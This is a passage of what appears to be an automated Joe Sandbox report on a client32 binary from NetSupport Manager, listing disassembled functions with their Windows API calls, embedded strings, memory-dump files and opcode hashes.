                                                                                                • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                                                • Opcode Fuzzy Hash: 4a7d6abcdd368d216a64646516aa5f6dee3f13f39ed5830a76ce57b1047c955b
                                                                                                • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                                                Function 69D00380 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DeleteCriticalSection.KERNEL32(?,986B9CC5,?,?,?,?,?,69D1F1E8,000000FF), ref: 69D003CA
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,000000FF), ref: 69D00415
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,000000FF), ref: 69D0043E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69D00472
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,000000FF), ref: 69D00480
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69D0048D
                                                                                                • LeaveCriticalSection.KERNEL32(69D2D004,?,?,?,000000FF), ref: 69D004CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CloseHandle$DeleteEnterEventLeaveObjectSingleWait
                                                                                                • String ID: Refcount.cpp$idata->Q.size () == 0
                                                                                                • API String ID: 2474944948-1089602151
                                                                                                • Opcode ID: ae2f4335df05f3eeca725c9ee68cb32f9526f61e26e73e904d77f650ca4ff8bc
                                                                                                • Instruction ID: 318e278f7cd78a33c9d454f5b271ebaf50bddd9b5dd1eea48df375f5732ab381
                                                                                                • Opcode Fuzzy Hash: ae2f4335df05f3eeca725c9ee68cb32f9526f61e26e73e904d77f650ca4ff8bc
                                                                                                • Instruction Fuzzy Hash: 0D41A6B5905640EFEF04DFA4D990A2AB7A4FF0A354700867EE61993B40D730E804CB54
                                                                                                Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1113F116
                                                                                                • MessageBeep.USER32(00000000,?,?,?,00000000,00000000), ref: 1113F1C9
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 1113F1F4
                                                                                                • UpdateWindow.USER32 ref: 1113F21B
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                                                • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 490496107-2775872530
                                                                                                • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                                • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                                                • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                                • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                                                Function 69CFCE00 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CFCE20
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D01928
                                                                                                  • Part of subcall function 69D01913: __CxxThrowException@8.LIBCMT ref: 69D0193D
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D0194E
                                                                                                • _memmove.LIBCMT ref: 69CFCEA7
                                                                                                • _memmove.LIBCMT ref: 69CFCECB
                                                                                                • _memmove.LIBCMT ref: 69CFCF05
                                                                                                • _memmove.LIBCMT ref: 69CFCF21
                                                                                                • std::exception::exception.LIBCMT ref: 69CFCF6B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CFCF80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                • String ID: deque<T> too long
                                                                                                • API String ID: 827257264-309773918
                                                                                                • Opcode ID: 28505bcff9fd901c4675bcc1fe26731c51ee5f1fdc92f4ac2611929579d23739
                                                                                                • Instruction ID: f8e85184550e94d1e692dc9fe837c207f8dff1d44377764993d1f5af6d31cf53
                                                                                                • Opcode Fuzzy Hash: 28505bcff9fd901c4675bcc1fe26731c51ee5f1fdc92f4ac2611929579d23739
                                                                                                • Instruction Fuzzy Hash: C641C4B2E00104ABDF04CF68CC91AAEB7B5AF94214F19C679D818D7744FB34EA02C7A0
                                                                                                Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                • _memmove.LIBCMT ref: 11035267
                                                                                                • _memmove.LIBCMT ref: 1103528B
                                                                                                • _memmove.LIBCMT ref: 110352C5
                                                                                                • _memmove.LIBCMT ref: 110352E1
                                                                                                • std::exception::exception.LIBCMT ref: 1103532B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                • String ID: deque<T> too long
                                                                                                • API String ID: 827257264-309773918
                                                                                                • Opcode ID: 0d42fcf2c6665ff0bcfd05c744c669d86a9d128a0191a4b9f369bc0003e73e85
                                                                                                • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                                                • Opcode Fuzzy Hash: 0d42fcf2c6665ff0bcfd05c744c669d86a9d128a0191a4b9f369bc0003e73e85
                                                                                                • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                                                Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                • _memmove.LIBCMT ref: 110193F7
                                                                                                • _memmove.LIBCMT ref: 1101941B
                                                                                                • _memmove.LIBCMT ref: 11019455
                                                                                                • _memmove.LIBCMT ref: 11019471
                                                                                                • std::exception::exception.LIBCMT ref: 110194BB
                                                                                                • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                • String ID: deque<T> too long
                                                                                                • API String ID: 827257264-309773918
                                                                                                • Opcode ID: 6002c026a0a3843e278de4644229898926d102e6b98fb29ed5a2a0942dab03f7
                                                                                                • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                                • Opcode Fuzzy Hash: 6002c026a0a3843e278de4644229898926d102e6b98fb29ed5a2a0942dab03f7
                                                                                                • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                                                Function 69CE3E90 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CE3EB0
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D01928
                                                                                                  • Part of subcall function 69D01913: __CxxThrowException@8.LIBCMT ref: 69D0193D
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D0194E
                                                                                                • _memmove.LIBCMT ref: 69CE3F39
                                                                                                • _memmove.LIBCMT ref: 69CE3F5D
                                                                                                • _memmove.LIBCMT ref: 69CE3F97
                                                                                                • _memmove.LIBCMT ref: 69CE3FB3
                                                                                                • std::exception::exception.LIBCMT ref: 69CE3FFD
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CE4012
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                • String ID: deque<T> too long
                                                                                                • API String ID: 827257264-309773918
                                                                                                • Opcode ID: b7722eb81c9a157f0cdce3324a3badf4dc302fe5e5361ace333a31d08fa71db7
                                                                                                • Instruction ID: f4204c90932385a305804fa9cf24d0adfd127c4423fc9b0544ba60cd28c3df93
                                                                                                • Opcode Fuzzy Hash: b7722eb81c9a157f0cdce3324a3badf4dc302fe5e5361ace333a31d08fa71db7
                                                                                                • Instruction Fuzzy Hash: A641C572E002049BDB04CF68DC91AAEB7B6EFD4214F19C679EC19D7754F634EA0187A0
                                                                                                Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                  • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                                  • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                  • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                                                • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                                                • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                                                • String ID: 8
                                                                                                • API String ID: 762489935-4194326291
                                                                                                • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                                • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                                                Function 11005210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 2755257978-4108050209
                                                                                                • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                                                • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                                                Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                                • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                                • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                                • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                                • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$Sleep
                                                                                                • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                                • API String ID: 4250438611-314227603
                                                                                                • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                                • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                                Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _strncmp.LIBCMT ref: 1100953A
                                                                                                • _strncmp.LIBCMT ref: 1100954A
                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110095EB
                                                                                                Strings
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                                • IsA(), xrefs: 110095A5, 110095CD
                                                                                                • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                                • https://, xrefs: 1100952F
                                                                                                • http://, xrefs: 11009535, 11009548
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
